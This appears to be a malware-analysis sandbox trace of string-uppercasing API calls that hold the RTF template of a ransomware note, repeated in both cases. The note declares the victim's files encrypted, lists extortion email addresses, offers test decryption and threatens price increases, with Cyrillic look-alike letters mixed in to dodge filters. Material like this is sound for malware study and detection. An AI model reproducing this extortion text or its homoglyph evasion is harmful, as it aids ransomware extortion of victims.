PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 ND Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR M\\F1\\LANG1049\\'E5\\F0\\LANG1033 SS\\F1\\LANG1049\\'E0\\F0\\LANG1033 G\\F1\\LANG1049\\'E5\\F0\\LANG1033 T\\F1\\LANG1049\\'EE\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 LL \\F1\\LANG1049\\'EE\\F0\\LANG1033 F \\F1\\LANG1049\\'EE\\F0\\LANG1033 UR 3 \\F1\\LANG1049\\'E5\\F0\\LANG1033 -M\\F1\\LANG1049\\'E0\\F0\\LANG1033 IL \\F1\\LANG1049\\'E0\\F0\\LANG1033 DDR\\F1\\LANG1049\\'E5\\F0\\LANG1033 SS\\F1\\LANG1049\\'E5\\F0\\LANG1033 S. THIS IS R\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 LL\\F1\\LANG1049\\'F3\\F0\\LANG1033 IMP\\F1\\LANG1049\\'EE\\F0\\LANG1033 RT\\F1\\LANG1049\\'E0\\F0\\LANG1033 NT B\\F1\\LANG1049\\'E5\\F0\\LANG1033 C\\F1\\LANG1049\\'E0\\F0\\LANG1033 US\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'EE\\F0\\LANG1033 F D\\F1\\LANG1049\\'E5\\F0\\LANG1033 LIV\\F1\\LANG1049\\'E5\\F0\\LANG1033 R\\F1\\LANG1049\\'F3\\F0\\LANG1033 PR\\F1\\LANG1049\\'EE\\F0\\LANG1033 BL\\F1\\LANG1049\\'E5\\F0\\LANG1033 MS \\F1\\LANG1049\\'EE\\F0\\LANG1033 F S\\F1\\LANG1049\\'EE\\F0\\LANG1033 M\\F1\\LANG1049\\'E5\\F0\\LANG1033 M\\F1\\LANG1049\\'E0\\F0\\LANG1033 IL S\\F1\\LANG1049\\'E5\\F0\\LANG1033 RVI\\F1\\LANG1049\\'F1\\'E5\\F0\\LANG1033 S!\\PAR\r\n\\CF1 IMPORTANT!\\CF0 IF YOU HAVEN'T RECEIVED A RESPONSE FROM US WITHIN 24 HOURS, PLEASE TRY TO USE A DIFFERENT EMAIL SERVICE\\F1\\LANG1049 (\\F0\\LANG1033 GMAIL, YAHOO, AOL, ETC\\F1\\LANG1049 )\\F0\\LANG1033 .\\PAR\r\n\\CF1 IMPORTANT!\\CF0 PLEASE CHECK YOUR SPAM FOLDER EACH TIME YOU WAIT FOR OUR RESPONSE! IF YOU FIND OUR EMAIL IN THE SPAM FOLDER PLEASE MOVE IT TO YOUR INBOX.\\PAR\r\n\\CF1 IMPORTANT! \\CF0 WE ARE ALWAYS IN TOUCH AND READY TO HELP YOU AS SOON AS POSSIBLE!\\PAR\r\n\\PAR\r\n\\B0\\F1\\LANG1049\\'C0\\F0\\LANG1033 TT\\F1\\LANG1049\\'E0\\F0\\LANG1033 CH UP T\\F1\\LANG1049\\'EE\\F0\\LANG1033 3 SM\\F1\\LANG1049\\'E0\\F0\\LANG1033 LL \\F1\\LANG1049\\'E5\\F0\\LANG1033 NCR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'E5\\F0\\LANG1033 D FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S F\\F1\\LANG1049\\'EE\\F0\\LANG1033 R FR\\F1\\LANG1049\\'E5\\'E5\\F0\\LANG1033 T\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST D\\F1\\LANG1049\\'E5\\'F1\\F0\\LANG1033 RYPTION. PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 TE TH\\F1\\LANG1049\\'E0\\F0\\LANG1033 T TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 U S\\F1\\LANG1049\\'E5\\F0\\LANG1033 ND US SH\\F1\\LANG1049\\'EE\\F0\\LANG1033 ULD N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T C\\F1\\LANG1049\\'EE\\F0\\LANG1033 NT\\F1\\LANG1049\\'E0\\F0\\LANG1033 IN \\F1\\LANG1049\\'E0\\F0\\LANG1033 N\\F1\\LANG1049\\'F3\\F0\\LANG1033 V\\F1\\LANG1049\\'E0\\F0\\LANG1033 LU\\F1\\LANG1049\\'E0\\F0\\LANG1033 BL\\F1\\LANG1049\\'E5\\F0\\LANG1033 INF\\F1\\LANG1049\\'EE\\F0\\LANG1033 RM\\F1\\LANG1049\\'E0\\F0\\LANG1033 TI\\F1\\LANG1049\\'EE\\F0\\LANG1033 N.\\F1\\LANG1049 \\F0\\LANG1033 W\\F1\\LANG1049\\'E5\\F0\\LANG1033 WILL S\\F1\\LANG1049\\'E5\\F0\\LANG1033 ND Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 U T\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST D\\F1\\LANG1049\\'E5\\F0\\LANG1033 CR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'E5\\F0\\LANG1033 D FILES IN \\F1\\LANG1049\\'EE\\F0\\LANG1033 UR R\\F1\\LANG1049\\'E5\\F0\\LANG1033 SP\\F1\\LANG1049\\'EE\\F0\\LANG1033 NS\\F1\\LANG1049\\'E5\\F0\\LANG1033 F\\F1\\LANG1049\\'EE\\F0\\LANG1033 R Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR C\\F1\\LANG1049\\'EE\\F0\\LANG1033 NFID\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'F1\\'E5\\F0\\LANG1033 .\\PAR\r\nOF COURSE YOU WILL RECEIVE ALL THE NECESSARY INSTRUCTIONS H\\F1\\LANG1049\\'EE\\F0\\LANG1033 W T\\F1\\LANG1049\\'EE\\F0\\LANG1033 D\\F1\\LANG1049\\'E5\\F0\\LANG1033 CR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S!\\PAR\r\n\\PAR\r\n\\CF1\\B IMPORTANT!\\PAR\r\n\\CF0 PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 TE THAT WE ARE PROFESSIONALS AND JUST DOING OUR JOB!\\PAR\r\nPLEASE D\\F1\\LANG1049\\'EE\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T W\\F1\\LANG1049\\'E0\\F0\\LANG1033 ST\\F1\\LANG1049\\'E5\\F0\\LANG1033 TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 TIM\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 ND D\\F1\\LANG1049\\'EE\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T TR\\F1\\LANG1049\\'F3\\F0\\LANG1033 TO D\\F1\\LANG1049\\'E5\\'F1\\'E5\\F0\\LANG1033 IVE US - IT WILL R\\F1\\LANG1049\\'E5\\F0\\LANG1033 SULT \\F1\\LANG1049\\'EE\\F0\\LANG1033 NLY PRI\\F1\\LANG1049\\'F1\\'E5\\F0\\LANG1033 INCR\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 !\\PAR\r\nW\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 ALW\\F1\\LANG1049\\'E0\\'F3\\F0\\LANG1033 S \\F1\\LANG1049\\'EE\\F0\\LANG1033 P\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'E5\\F0\\LANG1033 D F\\F1\\LANG1049\\'EE\\F0\\LANG1033 R DI\\F1\\LANG1049\\'E0\\F0\\LANG1033 L\\F1\\LANG1049\\'EE\\F0\\LANG1033 G \\F1\\LANG1049\\'E0\\F0\\LANG1033 ND R\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 DY T\\F1\\LANG1049\\'EE\\F0\\LANG1033 H\\F1\\LANG1049\\'E5\\F0\\LANG1033 LP \\F1\\LANG1049\\'F3\\'EE\\F0\\LANG1033 U.\\PAR\r\n\\CF2\\FS28 [RDM_STR]\\CF0\\F1\\FS32\\LANG1049\\PAR\r\n}\r\n") returned 0x1c28 [0064.343] CharUpperBuffW (in: lpsz="[EML2]", cchLength=0x6 | out: lpsz="[EML2]") returned 0x6 [0064.343] CharUpperBuffW (in: lpsz="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\n[EML3]\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 [KID]\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 [RDM_STR]\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchLength=0x1c34 | out: lpsz="{\\RTF1\\ANSI\\ANSICPG1251\\DEFF0\\NOUICOMPAT\\DEFLANG1049{\\FONTTBL{\\F0\\FNIL\\FCHARSET0 CALIBRI;}{\\F1\\FNIL\\FCHARSET204 CALIBRI;}}\r\n{\\COLORTBL ;\\RED255\\GREEN0\\BLUE0;\\RED255\\GREEN255\\BLUE255;}\r\n{\\*\\GENERATOR RICHED20 10.0.15063}\\VIEWKIND4\\UC1 \r\n\\PARD\\RI-74\\SL240\\SLMULT1\\QC\\TX8378\\B\\F0\\FS24\\LANG1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\PAR\r\n\r\n\\PARD\\RI-74\\SL240\\SLMULT1\\TX8378\\PAR\r\n\\B0 ALL Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S W\\F1\\LANG1049\\'E5\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'F1\\F0\\LANG1033 R\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'E5\\F0\\LANG1033 D WITH STR\\F1\\LANG1049\\'EE\\F0\\LANG1033 NG CR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'EE\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 LG\\F1\\LANG1049\\'EE\\F0\\LANG1033 RITHM \\F1\\LANG1049\\'C0\\'C5\\F0\\LANG1033 S-256 + RS\\F1\\LANG1049\\'C0\\F0\\LANG1033 -2048.\\PAR\r\nPL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 B\\F1\\LANG1049\\'E5\\F0\\LANG1033 SUR\\F1\\LANG1049\\'E5\\F0\\LANG1033 TH\\F1\\LANG1049\\'E0\\F0\\LANG1033 T Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S \\F1\\LANG1049\\'E0\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T BR\\F1\\LANG1049\\'EE\\F0\\LANG1033 K\\F1\\LANG1049\\'E5\\F0\\LANG1033 N \\F1\\LANG1049\\'E0\\F0\\LANG1033 ND \\F1\\LANG1049\\'F3\\'EE\\F0\\LANG1033 U C\\F1\\LANG1049\\'E0\\F0\\LANG1033 N R\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST\\F1\\LANG1049\\'EE\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 M T\\F1\\LANG1049\\'EE\\F0\\LANG1033 D\\F1\\LANG1049\\'E0\\F0\\LANG1033 Y.\\PAR\r\n\\PAR\r\nIF Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 U R\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 LL\\F1\\LANG1049\\'F3\\F0\\LANG1033 W\\F1\\LANG1049\\'E0\\F0\\LANG1033 NT T\\F1\\LANG1049\\'EE\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST\\F1\\LANG1049\\'EE\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 WRIT\\F1\\LANG1049\\'E5\\F0\\LANG1033 US T\\F1\\LANG1049\\'EE\\F0\\LANG1033 TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E5\\F0\\LANG1033 -M\\F1\\LANG1049\\'E0\\F0\\LANG1033 ILS:\\PAR\r\n\\B\\FS28 BOBGREEN85@CRIPTEXT.COM\\PAR\r\nBOBGREEN85@AOL.COM\\PAR\r\n[EML3]\\PAR\r\n\\B0\\FS24 IN SUBJ\\F1\\LANG1049\\'E5\\F0\\LANG1033 CT LIN\\F1\\LANG1049\\'E5\\F0\\LANG1033 WRIT\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'F3\\'EE\\F0\\LANG1033 UR ID: \\B\\FS28 [KID]\\FS24\\PAR\r\n\\PAR\r\n\\CF1 IMP\\F1\\LANG1049\\'EE\\F0\\LANG1033 RT\\F1\\LANG1049\\'E0\\F0\\LANG1033 NT!\\CF0 PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 ND Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR M\\F1\\LANG1049\\'E5\\F0\\LANG1033 SS\\F1\\LANG1049\\'E0\\F0\\LANG1033 G\\F1\\LANG1049\\'E5\\F0\\LANG1033 T\\F1\\LANG1049\\'EE\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 LL \\F1\\LANG1049\\'EE\\F0\\LANG1033 F \\F1\\LANG1049\\'EE\\F0\\LANG1033 UR 3 \\F1\\LANG1049\\'E5\\F0\\LANG1033 -M\\F1\\LANG1049\\'E0\\F0\\LANG1033 IL \\F1\\LANG1049\\'E0\\F0\\LANG1033 DDR\\F1\\LANG1049\\'E5\\F0\\LANG1033 SS\\F1\\LANG1049\\'E5\\F0\\LANG1033 S. THIS IS R\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 LL\\F1\\LANG1049\\'F3\\F0\\LANG1033 IMP\\F1\\LANG1049\\'EE\\F0\\LANG1033 RT\\F1\\LANG1049\\'E0\\F0\\LANG1033 NT B\\F1\\LANG1049\\'E5\\F0\\LANG1033 C\\F1\\LANG1049\\'E0\\F0\\LANG1033 US\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'EE\\F0\\LANG1033 F D\\F1\\LANG1049\\'E5\\F0\\LANG1033 LIV\\F1\\LANG1049\\'E5\\F0\\LANG1033 R\\F1\\LANG1049\\'F3\\F0\\LANG1033 PR\\F1\\LANG1049\\'EE\\F0\\LANG1033 BL\\F1\\LANG1049\\'E5\\F0\\LANG1033 MS \\F1\\LANG1049\\'EE\\F0\\LANG1033 F S\\F1\\LANG1049\\'EE\\F0\\LANG1033 M\\F1\\LANG1049\\'E5\\F0\\LANG1033 M\\F1\\LANG1049\\'E0\\F0\\LANG1033 IL S\\F1\\LANG1049\\'E5\\F0\\LANG1033 RVI\\F1\\LANG1049\\'F1\\'E5\\F0\\LANG1033 S!\\PAR\r\n\\CF1 IMPORTANT!\\CF0 IF YOU HAVEN'T RECEIVED A RESPONSE FROM US WITHIN 24 HOURS, PLEASE TRY TO USE A DIFFERENT EMAIL SERVICE\\F1\\LANG1049 (\\F0\\LANG1033 GMAIL, YAHOO, AOL, ETC\\F1\\LANG1049 )\\F0\\LANG1033 .\\PAR\r\n\\CF1 IMPORTANT!\\CF0 PLEASE CHECK YOUR SPAM FOLDER EACH TIME YOU WAIT FOR OUR RESPONSE! IF YOU FIND OUR EMAIL IN THE SPAM FOLDER PLEASE MOVE IT TO YOUR INBOX.\\PAR\r\n\\CF1 IMPORTANT! \\CF0 WE ARE ALWAYS IN TOUCH AND READY TO HELP YOU AS SOON AS POSSIBLE!\\PAR\r\n\\PAR\r\n\\B0\\F1\\LANG1049\\'C0\\F0\\LANG1033 TT\\F1\\LANG1049\\'E0\\F0\\LANG1033 CH UP T\\F1\\LANG1049\\'EE\\F0\\LANG1033 3 SM\\F1\\LANG1049\\'E0\\F0\\LANG1033 LL \\F1\\LANG1049\\'E5\\F0\\LANG1033 NCR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'E5\\F0\\LANG1033 D FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S F\\F1\\LANG1049\\'EE\\F0\\LANG1033 R FR\\F1\\LANG1049\\'E5\\'E5\\F0\\LANG1033 T\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST D\\F1\\LANG1049\\'E5\\'F1\\F0\\LANG1033 RYPTION. PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 TE TH\\F1\\LANG1049\\'E0\\F0\\LANG1033 T 